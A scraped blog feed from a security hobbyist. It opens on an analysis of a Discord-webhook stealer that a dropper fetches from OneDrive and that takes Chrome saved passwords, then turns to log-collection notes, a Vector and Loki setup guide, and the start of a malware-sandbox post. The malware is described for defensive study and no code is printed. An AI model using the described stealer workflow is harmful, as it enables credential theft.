src="https://blogger.googleusercontent.com/img/a/AVvXsEjN0JDQvP0e0iCqxmA5ER4wu3CQZC6QQCjoJc5ZRR-cgD_2Fj_gGpo9sAosJVi_WLx53D_dh8OBo2qV5N7B3MfmA3UeLaA8IQ_Kw6RykF0Z4XE1wrzaOiCqOIUU8W_rHrFgj74B0ZxyOc1gCvvtjFP5cCbpcU8yslC74xvUF2kmjh3Qo62Gk5dKXy0z=s16000" /></a></div><br />The executable drops and starts temp.ps1, which contains code to hide the window.<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEghbVPjcmbhkyYyZQTOpoxyG2KNVteNlOCXT-fH3OZFGstYztYYBi8XqjutuICHcOC611xMu7thNM1XxUfnNVPCSkrYx3M6OSE8yEGUcZTxEMNTTh-ks7jIMAMO4m5qkUYw-BIVfpN6UF9VksXeYgElkFchs0O3kpnIcpLwEegXYApm1lK2_fEJZPrg" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="179" data-original-width="488" height="234" src="https://blogger.googleusercontent.com/img/a/AVvXsEghbVPjcmbhkyYyZQTOpoxyG2KNVteNlOCXT-fH3OZFGstYztYYBi8XqjutuICHcOC611xMu7thNM1XxUfnNVPCSkrYx3M6OSE8yEGUcZTxEMNTTh-ks7jIMAMO4m5qkUYw-BIVfpN6UF9VksXeYgElkFchs0O3kpnIcpLwEegXYApm1lK2_fEJZPrg=w640-h234" width="640" /></a></div><br />Once the window is hidden, it seems to download and execute MachineMania.exe which is a python executable file made with pyinstaller. Argument provided to the machinemania.exe during executing is a discord webhook.<p></p><p>Looking through Triage and file access I see the following:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh1v20NI57ct06UtR1hLMCOFvsJ2K9ByTyF5F67MHfDFcz7kK6nMFXB6Lvdri4_wYQFcXFWNRWYzuJ8u-UL6UFFkIKS_QQsSVhEqzyXCGxMTCGDS2rsUZSjPHvmgCQfzLYdPtEK-rzfHp1RHj43cfLq2OWt-bn1ApQVciRIMkXa7paGGApyD20j1NcL" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="982" data-original-width="1043" src="https://blogger.googleusercontent.com/img/a/AVvXsEh1v20NI57ct06UtR1hLMCOFvsJ2K9ByTyF5F67MHfDFcz7kK6nMFXB6Lvdri4_wYQFcXFWNRWYzuJ8u-UL6UFFkIKS_QQsSVhEqzyXCGxMTCGDS2rsUZSjPHvmgCQfzLYdPtEK-rzfHp1RHj43cfLq2OWt-bn1ApQVciRIMkXa7paGGApyD20j1NcL=s16000" /></a></div><br />It appears to be looking for applications listed above but I'm not sure if it actually does anything if the apps are installed.<p></p><p><br /></p><p>Network traffic kinda looks like this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiSeR2-MYFEmDkLrWMC300lydXuzcg57HRsfelRXrl-hY73wJ_CRV4f5CgnaxJ4bFomm8UVuBiNnqkLDgrla9tgsOq6Gj94AGvKm4SDEzSQuMuIiHI27wM6UebANmlbhMN-euh9E8I4W_q745Zo8kfuocoL5vhrRjksMtiQcTZ_oKwGqCyNGp4Z8zDS" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="197" data-original-width="501" height="158" src="https://blogger.googleusercontent.com/img/a/AVvXsEiSeR2-MYFEmDkLrWMC300lydXuzcg57HRsfelRXrl-hY73wJ_CRV4f5CgnaxJ4bFomm8UVuBiNnqkLDgrla9tgsOq6Gj94AGvKm4SDEzSQuMuIiHI27wM6UebANmlbhMN-euh9E8I4W_q745Zo8kfuocoL5vhrRjksMtiQcTZ_oKwGqCyNGp4Z8zDS=w400-h158" width="400" /></a></div><p></p><p>It looks like there is a connection to OneDrive. I was pretty sure that's where the MachineMania.exe was being downloaded from but I didn't see much in the pcap or Triage output.</p><p>I went back to debugger and found the exact OneDrive link in the memory which is hosting MachineMania.exe</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEigI5prRfadM5v87kRFHs4qqc-Tv_JfldXqeAJlpmoFYfBlt2Ogzt88DFCXBXgwTgipzYQ9W57_E9qEZa-G-1EP8Jnq-8NRuE1FSd5mS7Z5ONiHcqIiQN2aG7P6Z8A7p5uyixB5dIc643JM3g8YBXYQf5F9qG-OQjW2ZlYr6mR8Gyn1TYMbKr_wsToV" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="602" data-original-width="1089" src="https://blogger.googleusercontent.com/img/a/AVvXsEigI5prRfadM5v87kRFHs4qqc-Tv_JfldXqeAJlpmoFYfBlt2Ogzt88DFCXBXgwTgipzYQ9W57_E9qEZa-G-1EP8Jnq-8NRuE1FSd5mS7Z5ONiHcqIiQN2aG7P6Z8A7p5uyixB5dIc643JM3g8YBXYQf5F9qG-OQjW2ZlYr6mR8Gyn1TYMbKr_wsToV=s16000" /></a></div><br /><br /><p></p><p><b>Looking at MachineMania.exe:</b></p><p>Hash: 725918a6ae94e864908946ebb5e98dee</p><p>This is pyinstaller file. </p><p>I analyzed that file in Triage but I replaced discord webhook with webhook.site webhook</p><p><a href="https://tria.ge/220220-ycs26scgdr/behavioral1">https://tria.ge/220220-ycs26scgdr/behavioral1</a></p><p>File interaction looks a bit different in analysis of this file. Unlike the original file, this file only looks at Chrome folder.</p><p></p><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgGUWsfH4ZmQbmhnxRmfBbBDwXvYTKrUUB0uaN8yXcibGHhtlvdvWQWzcpNAunEDVEH7G9GdAeDf1omMGFaMDYJWdaSTPqOY-uAXbQw5-Wq4HekmRf7fB8ILUDyF6bL8MJMp1TTX8nsZG7w9VbkNgNec2WfnIym-K7b46CAvGh-m3PP1GvWoV3T0siv" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="993" data-original-width="971" src="https://blogger.googleusercontent.com/img/a/AVvXsEgGUWsfH4ZmQbmhnxRmfBbBDwXvYTKrUUB0uaN8yXcibGHhtlvdvWQWzcpNAunEDVEH7G9GdAeDf1omMGFaMDYJWdaSTPqOY-uAXbQw5-Wq4HekmRf7fB8ILUDyF6bL8MJMp1TTX8nsZG7w9VbkNgNec2WfnIym-K7b46CAvGh-m3PP1GvWoV3T0siv=s16000" /></a></div><br />The webhook requests look kinda like this:<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjMaeYH1etJUbei7zqmqGqWx8jQ_mQz-3mn7YbknLWarAMYN_HmR3THDM9aB_qR2d2cuAvqLw9KabKWfWYndTpEtEY7O2SiBnJPcq0KzSSaKnFWMgJWzy3zbmDPWuX41VCg4BQgGZi-wNRnuq0Ws9104r8FXeOiC9wV9fJBQ2mCBXSzCZdww5E9k9yo" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="359" data-original-width="879" height="261" src="https://blogger.googleusercontent.com/img/a/AVvXsEjMaeYH1etJUbei7zqmqGqWx8jQ_mQz-3mn7YbknLWarAMYN_HmR3THDM9aB_qR2d2cuAvqLw9KabKWfWYndTpEtEY7O2SiBnJPcq0KzSSaKnFWMgJWzy3zbmDPWuX41VCg4BQgGZi-wNRnuq0Ws9104r8FXeOiC9wV9fJBQ2mCBXSzCZdww5E9k9yo=w640-h261" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgRp0de9WD3TF2XXDykETSTHuPjmcNwVyInzj2xHb5rKHfaZnT3UNZW4w-3oktJZ5fpSRkFCvrBMGG_vlyMY9curzjj8eJbMtMILUk9NLzP-G82SkECwLZbsyAyxwkc-EvCBKRSFuB02CyPzUciBhuW26W_ALXSdiPzyjYqUMKZzQ-eJ_Z_05xR1g-Q" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="446" data-original-width="968" height="294" src="https://blogger.googleusercontent.com/img/a/AVvXsEgRp0de9WD3TF2XXDykETSTHuPjmcNwVyInzj2xHb5rKHfaZnT3UNZW4w-3oktJZ5fpSRkFCvrBMGG_vlyMY9curzjj8eJbMtMILUk9NLzP-G82SkECwLZbsyAyxwkc-EvCBKRSFuB02CyPzUciBhuW26W_ALXSdiPzyjYqUMKZzQ-eJ_Z_05xR1g-Q=w640-h294" width="640" /></a></div><br />It appears to be only looking at Chrome. <p></p><p><br /></p><p>To further analyze the file, I started to decompile the pyinstaller file to see what it has inside of it.</p><p>I used this to extract the files: <a href="https://github.com/extremecoders-re/pyinstxtractor">https://github.com/extremecoders-re/pyinstxtractor</a></p><p>I found the following files to be interesting</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjvMAaL0uyIJHljvkcl_dNxCJa0uZHQRO-y81V_1ftsZxD4JgWyb2bDkTZX9Mw3MwS60px0zG__OWdloZ7vk_VAvEVwjqm3MjZ1VYn6zA2I2FVZBF5PE_ieBiPXqgCTU5CPhLj5JuZL8qrETCLS-jKeko3O2k80gW1WM2tHaeU5G6jeKgdb0FSCyWuo" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="137" data-original-width="615" height="142" src="https://blogger.googleusercontent.com/img/a/AVvXsEjvMAaL0uyIJHljvkcl_dNxCJa0uZHQRO-y81V_1ftsZxD4JgWyb2bDkTZX9Mw3MwS60px0zG__OWdloZ7vk_VAvEVwjqm3MjZ1VYn6zA2I2FVZBF5PE_ieBiPXqgCTU5CPhLj5JuZL8qrETCLS-jKeko3O2k80gW1WM2tHaeU5G6jeKgdb0FSCyWuo=w640-h142" width="640" /></a></div><br />discordwebhook content looks like it's just doing POST request.<p></p><p>I wasn't able to get anything out of chrome.pyc file but it appears to be backed with pyarmor.</p><p><br /></p><p>Additionally, while doing some analysis of the original file in debugger I also saw this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgJRjYUunNbr3vKaGWC0SYD2yEMDIqNWAUYbQCMsKukshTBDUAk6ZULTaaB8LhkS5qYrKutEV_72e0JjDCh1lMcNElTtDVpA-RVqBNyKF7AwvIl_oIRFI_UxK-H2M6QfG_4tcKbgLYffuHFJagvxSHLiFlq6yyHFJGcsLoHDXgHAKPo8e6Joxep48BJ" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="829" data-original-width="1097" src="https://blogger.googleusercontent.com/img/a/AVvXsEgJRjYUunNbr3vKaGWC0SYD2yEMDIqNWAUYbQCMsKukshTBDUAk6ZULTaaB8LhkS5qYrKutEV_72e0JjDCh1lMcNElTtDVpA-RVqBNyKF7AwvIl_oIRFI_UxK-H2M6QfG_4tcKbgLYffuHFJagvxSHLiFlq6yyHFJGcsLoHDXgHAKPo8e6Joxep48BJ=s16000" /></a></div><br /><br /><p></p><p>I'm not really sure about what other capabilities the original file has. There is probably more but I mostly looked at the dropped pyinstaller/machinemania.exe file. I'm not sure about how nodejs code can be packed as executable.</p><p><br /></p><p><b>Conclusion</b></p><p>Based on limited and quick analysis, it looks like compromised account will share the exe file.</p><p>original exe file will download and execute file from onedrive</p><p>onedrive file will steal data and send it to discord via webhook.</p><p>to me, the onedrive file only seems to be stealing chrome saved passwords and nothing else.</p><p><br /></p><p>Similar sample: <a href="https://twitter.com/GlitchyPSI/status/1439674473515569154">https://twitter.com/GlitchyPSI/status/1439674473515569154</a></p><p><a href="https://www.virustotal.com/gui/file/60e75541c4b4130151fb2b80f04cd699ba0e66bf6c4ec364127e93a38dccefa9/relations">https://www.virustotal.com/gui/file/60e75541c4b4130151fb2b80f04cd699ba0e66bf6c4ec364127e93a38dccefa9/relations</a></p><p>Check the Execution Parents. There are a lot of node binaries and filenames usually look like names of games.</p><p></p>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-3854135927461275532021-12-12T20:00:00.000-08:002021-12-12T20:00:01.581-08:00notes/links about log collection, storage, and searching<p><b>Introduction</b></p><p>Just some notes about log collection, storage, and searching.</p><p>I just want to be able to store some log data for a long time and do searches on it later in the future, once in a while. I'm not trying to produce a report with the data or do alerting or transport the logs securely.</p><p>One of my use cases is collecting network data and storing that for a long time and maybe searching for a specific domain or IP in the future that could've been related to a security incident. </p><p>Similar for incoming http traffic. I'd like to see if someone tried to access a specific URI a really long time ago. (maybe when vuln related to that URI wasn't public at the time)</p><p>(leaving out elasticsearch-based things, splunk, and cloud-based services)</p><p>notes/links should help w/ research if anyone else is trying to do the same thing as me</p><p><br /></p><p><b>Gathering & shipping logs:</b></p><p>For Windows Event Logs:</p><p>- fluentbit - <a href="https://docs.fluentbit.io/manual/pipeline/inputs/windows-event-log">https://docs.fluentbit.io/manual/pipeline/inputs/windows-event-log</a></p><p>- fluentd - <a href="https://docs.fluentd.org/input/windows_eventlog">https://docs.fluentd.org/input/windows_eventlog</a></p><p>- nxlog - <a href="https://nxlog.co/docs/nxlog-ce/nxlog-reference-manual.html#im_msvistalog">https://nxlog.co/docs/nxlog-ce/nxlog-reference-manual.html#im_msvistalog</a></p><p>- winlogbeat - <a href="https://www.elastic.co/downloads/beats/winlogbeat-oss">https://www.elastic.co/downloads/beats/winlogbeat-oss</a></p><p>- promtail - <a href="https://grafana.com/docs/loki/latest/clients/promtail/scraping/#windows-event-log">https://grafana.com/docs/loki/latest/clients/promtail/scraping/#windows-event-log</a></p><p><br /></p><p>- Windows event forwarding - https://docs.microsoft.com/en-us/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection WEF sends logs from all the hosts to one collector host</p><p>For other text file based logs (linux, webapp, etc..)</p><p>- all the tools above</p><p>- vector - <a href="https://vector.dev/components/">https://vector.dev/components/</a></p><p>- filebeat - <a href="https://www.elastic.co/downloads/beats/filebeat-oss">https://www.elastic.co/downloads/beats/filebeat-oss</a></p><p>- rsyslog - <a href="https://www.rsyslog.com/">https://www.rsyslog.com/</a></p><p>- syslog-ng - <a href="https://www.syslog-ng.com/products/open-source-log-management/">https://www.syslog-ng.com/products/open-source-log-management/</a></p><p>- logstash - <a href="https://www.elastic.co/downloads/logstash-oss">https://www.elastic.co/downloads/logstash-oss</a></p><p><br /></p><p>some of the tools listed above can take in forwarded events (syslog, logtash/beats, etc) from other products and tools as well. </p><p><br /></p><p>- kafka - <a href="https://kafka.apache.org/">https://kafka.apache.org/</a> another option for just getting logs from various sources and forwarding them to some other place</p><p><br /></p><p>input/output, sources/sinks:</p><p>- kafka - <a href="https://cwiki.apache.org/confluence/display/KAFKA/Ecosystem">https://cwiki.apache.org/confluence/display/KAFKA/Ecosystem</a></p><p>- vector - <a href="https://vector.dev/components/">https://vector.dev/components/</a></p><p>- fluentbit - <a href="https://docs.fluentbit.io/manual/pipeline/inputs">https://docs.fluentbit.io/manual/pipeline/inputs</a> </p><p><a href="https://docs.fluentbit.io/manual/pipeline/outputs">https://docs.fluentbit.io/manual/pipeline/outputs</a></p><p>- fluentd - <a href="https://docs.fluentd.org/input">https://docs.fluentd.org/input</a></p><p><a href="https://docs.fluentd.org/output">https://docs.fluentd.org/output</a></p><p>- logstash - <a href="https://www.elastic.co/guide/en/logstash/current/input-plugins.html">https://www.elastic.co/guide/en/logstash/current/input-plugins.html</a></p><p><a href="https://www.elastic.co/guide/en/logstash/current/output-plugins.html">https://www.elastic.co/guide/en/logstash/current/output-plugins.html</a></p><p>- rsyslog - <a href="https://www.rsyslog.com/plugins/">https://www.rsyslog.com/plugins/</a></p><p><br /></p><p><b>Log processing:</b></p><p>You may want to process the data to drop certain events or append data to some events. For example, for network data, you may want to use a filter that adds geoip info. You may also want to rename fields.</p><p>Many of the collectors and shippers listed above already have some ability to modify or parse the log data. </p><p>Some of the tools are calling these plugins/modules filter or processing or transformer. You may also be able to write your own plugins or some code (some tools above support Lua) to change the logs before output part happens.</p><p>Depending on the type of processing you may want to do, you may need to output the logs into a different format that your application understands then process it and put it back into the pipeline for the next step or storage.</p><p>For kafka, I found faust (<a href="https://faust.readthedocs.io/en/latest/">https://faust.readthedocs.io/en/latest/</a>) but there are other libraries too for python and other langs.</p><p><b><br /></b></p><p><b>Log storage:</b></p><p>The output part in almost all the tools listed above can send data to various places where logs can be index and/or stored. </p><p>You can always store logs to disk on one host w/ compression (obviously searching this is not very fun). Files can also be stored in the cloud. Everything pretty much has s3 output support.</p><p>For files stored on disk, many of the tools will allow you to select format such as text, json, etc..</p><p>Tools such as logrotate can be used to move, compress, or delete the logs (<a href="https://linux.die.net/man/8/logrotate">https://linux.die.net/man/8/logrotate</a>)</p><p>cron job/scheduled tasks and some scripts can always be used to move, compress, or delete files as well. </p><p>For being able to easily store and search logs, there is Grafana Loki - <a href="https://www.boredhackerblog.info/2021/11/collecting-unifi-logs-with-vector-and.html">https://www.boredhackerblog.info/2021/11/collecting-unifi-logs-with-vector-and.html</a></p><p>Grafana Loki is somewhat similar to elasticsearch or splunk and you can use Grafana webui to query the data.</p><p>While doing more research, I came across clickhouse (which is also supported by some of the tools above) (<a href="https://clickhouse.com">https://clickhouse.com</a>/) Clickhouse can store json data and you can do sql queries on that data. </p><p>I also came across cloki, which is using clickhouse but emulating loki (<a href="https://github.com/lmangani/cloki">https://github.com/lmangani/cloki</a>)</p><p>The backend is a clickhouse database and you push logs into loki emulator, just like you'd push logs into loki. cloki also supports the same query language as loki and will work with grafana loki connector.</p><p><br /></p><p><b>Log search:</b></p><p>Searching the logs depends on how they're stored obviously. For uncompressed or compressed logs, tools such as grep or zgrep or ripgrep (https://github.com/BurntSushi/ripgrep) can be used for searching.</p><p>On Windows, there are a few tools that can be used to search and/or query logs. Fileseek (<a href="https://www.fileseek.ca/">https://www.fileseek.ca/</a>) can be used to search a bunch of files. There is Logfusion (<a href="https://www.logfusion.ca/">https://www.logfusion.ca/</a>) as well which can be used to read log files.</p><p>There is also Log Parser Lizard (<a href="https://lizard-labs.com/log_parser_lizard.aspx">https://lizard-labs.com/log_parser_lizard.aspx</a>) which can be used to query log files and even save queries and produce charts or reports.</p><p>Files can also be loaded into python w/ pandas for searches, complex searches, or statistical analysis. Pandas supports loading various file types. (<a href="https://pandas.pydata.org/docs/reference/io.html">https://pandas.pydata.org/docs/reference/io.html</a>)</p><p>Finally, if you end up using loki or cloki, grafana can be used to do queries. Grafana also has connectors/plugins for other database/log storage systems. </p><p><br /></p><p><b>Sample logs:</b></p><p>To play with any of the tools above without making changes in production env, you can use sample logs or data sources.</p><p><a href="https://github.com/logpai/loghub">https://github.com/logpai/loghub</a> - github repo that links to several sample logs</p><p><a href="https://www.secrepo.com/">https://www.secrepo.com/</a> - logs related to security. there are some network traffic logs in there</p><p><a href="https://www.sec.gov/dera/data/edgar-log-file-data-set.html">https://www.sec.gov/dera/data/edgar-log-file-data-set.html</a> - EDGAR log files</p><p><a href="https://log-sharing.dreamhosters.com/">https://log-sharing.dreamhosters.com/</a> - various log files</p><p><a href="https://www.logs.to/">https://www.logs.to/</a> - log generator (various types)</p><p><a href="https://github.com/mingrammer/flog">https://github.com/mingrammer/flog</a> - log generator</p><p><a href="https://certstream.calidog.io/">https://certstream.calidog.io/</a> - certificate transparency logs</p><p><a href="http://www.hivemq.com/demos/websocket-client/">http://www.hivemq.com/demos/websocket-client/</a> / broker.mqttdashboard.com - If you want to grab MQTT demo data. I'm pretty sure people are using this for free for their projects too...</p><p><br /></p><p><br /></p><p>ps: i'm not an engineer or an observability expert. Implementation of various tools above varies and may have impact on resource usage.</p>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-78293301128326054212021-11-26T15:53:00.000-08:002021-11-26T15:53:01.699-08:00Collecting Unifi logs with Vector and Grafana Loki<h2 style="text-align: left;"><b>Introduction</b></h2><p>This post just discusses sending unifi logs to grafana loki and utilizing vector.dev/vector agent.</p><p>Typically for log collection I would utilize something like Beats (filebeat, winlogbeat) and Logstash. Logstash unfortunately, in my experience, uses too much memory and CPU resources so I decided to search for an alternative. I came across vector.dev, fluentd, and fluentbit. Vector.dev seemed to be easy to install, configure, and use so I decided to give that a try. </p><p>For log storage and search, I would normally use Elasticsearch & Kibana, Opensearch, Graylog, or Humio. Humio would be hosted in the cloud and anything that's Elasticsearch or Elasticsearch-based would also require too much memory and CPU resources. I found Grafana Loki and decided to try that. It seems relatively lightweight for my needs and runs locally. Also I saw a Techno Tim video on Loki recently.</p><p>Logs will be stored with Loki and I'll use Grafana to connect to Loki and use it to query and display the data.</p><p>Vector and Grafana Loki will be running on a NUC w/ Celeron CPU w/ 4GB RAM so having something that runs on Pi (grafana has an article where they run grafana loki on a pi) is nice.</p><h2 style="text-align: left;"><b>Design</b></h2><p>Unifi controller has an option to send logs to a remote system so that's what I'll be using to send logs. It will send syslog (udp) to an IP address. </p><p>Vector has sources, transforms, and sinks. Source is input/data source, transforms can apply various operations to the data, such as filtering or renaming fields, and sink is basically the output. I will be just using source and sink. Source in this case will be syslog. Vector will listen on a port for syslog messages. Sink will be Loki since that's where the logs will be stored.</p><p>I'll have one VM running vector and the same VM will be running Grafana UI and Loki using docker-compose.</p><p>Unifi Controller Syslog -> (syslog source) Vector (Loki sink) -> Loki <- Grafana WebUI</p><p>I am not using doing any encryption in transit or using authentication for loki, it is an option.</p><h2 style="text-align: left;"><b>Setup</b></h2><p>I have an Ubuntu 20.04 server w/ docker and docker-compose installed.</p><h3 style="text-align: left;"><b>Grafana Loki</b></h3><p>Grafana docker tutorial shows how to set up grafana loki with docker-compose: https://grafana.com/docs/loki/latest/installation/docker/ </p><p>I removed promtail container from my configuration.</p><p>Here's the configuration I'm using:</p><p><a href="https://gist.github.com/BoredHackerBlog/de8294818027d450ecc2aed9c94c5260" target="_blank">https://gist.github.com/BoredHackerBlog/de8294818027d450ecc2aed9c94c5260</a></p><p>Create a new loki folder and grafana folder as docker will mount.</p><p>Download https://raw.githubusercontent.com/grafana/loki/v2.4.1/cmd/loki/loki-local-config.yaml and place it in loki folder and rename the file to local-config.yaml. Change the configuration if needed.</p><p>No need to download and place anything in the grafana folder.</p><p>Run docker-compose up -d to start grafana and loki.</p><p>Grafana webui is running on port 3000 and default creds are admin/admin.</p><p>Go to configuration and add loki as the data source. docker-compose file refers to that container as loki so it'll be at http://loki:3100.</p><p></p><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhonvYKQw-KgnXbVh8COBvmSrOvCaTwDCEJmXAGboVm5dqVI6nLoxXXKEVDbuc0le8gUhzBITIpoBiNdj1yXX2V5ufWXUdBluBMBIsMy-Ys5iGf1TL0EHAJOJatyHEBr_oOzNDzrt1iYSY/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="262" data-original-width="236" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhonvYKQw-KgnXbVh8COBvmSrOvCaTwDCEJmXAGboVm5dqVI6nLoxXXKEVDbuc0le8gUhzBITIpoBiNdj1yXX2V5ufWXUdBluBMBIsMy-Ys5iGf1TL0EHAJOJatyHEBr_oOzNDzrt1iYSY/" width="216" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWAyXTDHEkhxrV9rw678BLTULHod9LFonoBzgBQWhU9nga8y2_u7OpCAGbCbhEEsv22ja4DA8uluYWKdVF1vK1ANS4ju9mWp4KAk1hyTLgH5MJH5axmz63WZQ2K4P4j5BBB5lQscWzsro/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="620" data-original-width="677" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWAyXTDHEkhxrV9rw678BLTULHod9LFonoBzgBQWhU9nga8y2_u7OpCAGbCbhEEsv22ja4DA8uluYWKdVF1vK1ANS4ju9mWp4KAk1hyTLgH5MJH5axmz63WZQ2K4P4j5BBB5lQscWzsro/w400-h366/image.png" width="400" /></a></div><br /><h3 style="text-align: left;"><b>Vector</b></h3><p style="text-align: left;">Now Vector needs to be setup.</p><p style="text-align: left;">I'm setting it up by just following their quickstart guide.</p><p style="text-align: left;">I ran: curl --proto '=https' --tlsv1.2 -sSf https://sh.vector.dev | bash</p><p style="text-align: left;">Default config file is located at ~/.vector/config/vector.toml</p><p style="text-align: left;">Here's my config for syslog source and loki sink:</p><p style="text-align: left;"><a href="https://gist.github.com/BoredHackerBlog/de8294818027d450ecc2aed9c94c5260">https://gist.github.com/BoredHackerBlog/de8294818027d450ecc2aed9c94c5260</a></p><p style="text-align: left;">I modified the syslog port to be 1514 so I can vector as a non-privileged user and I also changed mode to udp.</p><p style="text-align: left;">For loki sink, label is required but your label key value can be anything you prefer. I could have done labels.system = "unifi" and it would work just fine.</p><p style="text-align: left;">Once configuration is done, the following command can be ran to start vector: vector --config ~/.vector/config/vector.toml</p><h3 style="text-align: left;"><b>Unifi controller</b></h3><p style="text-align: left;">In unifi controller settings, remote logging option is under Settings -> System -> Application Configuration -> Remote Logging</p><p style="text-align: left;">Here's what my configuration looks like:</p><p style="text-align: left;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNPN1I1eIF4CK4YbNMAJemuwxeK9y34N1lEl35Xr0nPYdEphyUfay6Bcd_3muov4IzPFcuxRlpqijelWv_JdrY124WGhA6ugSj14pUORl7bppnzBwhXIZcHZg57di-P1ACBUUSZzWJBlw/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="835" data-original-width="683" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNPN1I1eIF4CK4YbNMAJemuwxeK9y34N1lEl35Xr0nPYdEphyUfay6Bcd_3muov4IzPFcuxRlpqijelWv_JdrY124WGhA6ugSj14pUORl7bppnzBwhXIZcHZg57di-P1ACBUUSZzWJBlw/w327-h400/image.png" width="327" /></a></div><p></p><p style="text-align: left;">Click Apply to apply changes and the logs should flow to vector and into loki.</p><p style="text-align: left;"><br /></p><p style="text-align: left;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7EE_R9i_tk9bwxc4MllKPRPZ3zRzQawcLGWwnugnkQ_50naN2VH9N7kSzD4iOQmKwVe1xJaG9a8K7xhwfFup-KcZ9T4Pym5SXPsJeuw8unanSq1342lHeNEWYS9OoVXdRe9r6vtciERA/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="739" data-original-width="1167" height="405" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7EE_R9i_tk9bwxc4MllKPRPZ3zRzQawcLGWwnugnkQ_50naN2VH9N7kSzD4iOQmKwVe1xJaG9a8K7xhwfFup-KcZ9T4Pym5SXPsJeuw8unanSq1342lHeNEWYS9OoVXdRe9r6vtciERA/w640-h405/image.png" width="640" /></a></div><br /><p></p><p style="text-align: left;"><br /></p><p style="text-align: left;"><b>!!!</b></p><h3 style="text-align: left;"><b>no logs in grafana query</b></h3><p style="text-align: left;">I did have a weird issue where logs didnt show up in grafana query but would show up when i do live query.</p><p style="text-align: left;">I ran "sudo timedatectl set-timezone America/New_York" to update my timezone and that fixed the issue. (or it didn't but i think it did because queries did show results after i ran this)</p><p style="text-align: left;"><b>!!!</b></p><div><h2 style="text-align: left;"><b>Resources</b></h2><p><a href="https://grafana.com/oss/loki/">https://grafana.com/oss/loki/</a></p><p><a href="https://techno-tim.github.io/posts/grafana-loki/">https://techno-tim.github.io/posts/grafana-loki/</a></p><p><a href="https://www.youtube.com/watch?v=h_GGd7HfKQ8">https://www.youtube.com/watch?v=h_GGd7HfKQ8</a></p><p><a href="https://grafana.com/docs/loki/latest/installation/docker/">https://grafana.com/docs/loki/latest/installation/docker/</a></p><p><a href="https://grafana.com/docs/loki/latest/logql/log_queries/">https://grafana.com/docs/loki/latest/logql/log_queries/</a></p><p><a href="https://vector.dev/">https://vector.dev/</a></p><p><a href="https://vector.dev/docs/reference/configuration/sources/syslog/">https://vector.dev/docs/reference/configuration/sources/syslog/</a></p><p><a href="https://vector.dev/docs/reference/configuration/sinks/loki/">https://vector.dev/docs/reference/configuration/sinks/loki/</a></p><p><a href="https://grafana.com/blog/2019/08/22/homelab-security-with-ossec-loki-prometheus-and-grafana-on-a-raspberry-pi/">https://grafana.com/blog/2019/08/22/homelab-security-with-ossec-loki-prometheus-and-grafana-on-a-raspberry-pi/</a></p><p><a href="https://support.rocketcyber.com/hc/en-us/articles/360017917457-How-do-I-configure-syslog-remote-logging-for-a-Ubiquiti-Unifi-Security-Gateway-USG-">https://support.rocketcyber.com/hc/en-us/articles/360017917457-How-do-I-configure-syslog-remote-logging-for-a-Ubiquiti-Unifi-Security-Gateway-USG-</a></p><p><br /></p><p><br /></p></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-50453790565028195142021-04-10T14:22:00.000-07:002021-04-10T14:22:19.688-07:00Creating a malware sandbox for sysmon and windows event logs with virtualbox and vmexec<h2 style="text-align: left;">Introduction</h2><p>I was doing some research around detection related to maldoc/initial access. Usually, I've seen malicious Word or Excel documents and in some cases compressed files containing Word document, Excel document, script, or an executable. In a lot of cases LOLBIN/LOLBAS are abused. You can see this this happening a lot of sandbox (anyrun, VT dynamic, hatching triage, etc..) outputs as well.</p><p>I came across some guidance around blocking some LOLBIN/LOLBAS files with Windows Firewall to prevent some of the initial compromise activity. There multiple scripts and blog posts related to this. Essentially, Windows Firewall rules are added to prevent some of the executables from connecting to the 